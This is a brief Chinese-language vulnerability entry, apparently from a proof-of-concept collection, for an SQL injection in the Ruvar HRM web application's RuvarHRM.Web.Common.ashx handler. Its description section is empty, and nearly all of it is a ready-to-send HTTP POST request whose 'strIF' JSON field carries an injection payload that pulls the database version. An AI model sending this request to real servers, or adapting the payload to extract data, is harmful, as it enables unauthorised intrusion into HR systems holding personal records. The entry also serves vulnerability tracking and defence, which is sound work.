Ruvar HRM RuvarHRM.Web.Common.ashx SQL注入漏洞

日期: 2025-10-29 | 影响软件: ruvar_hrm | POC: 已公开

漏洞描述

PoC代码

POST /ajaxpro/RuvarHRM.Web.Common.get_account_by_tree,RuvarHRM.Web.Common.ashx HTTP/1.1
Host: 
Content-Type: application/json
X-Ajaxpro-Method: SearchUsers

{"strIF":"1=1) and 1=@@version--","deptPv":"0","strUserType":"all"}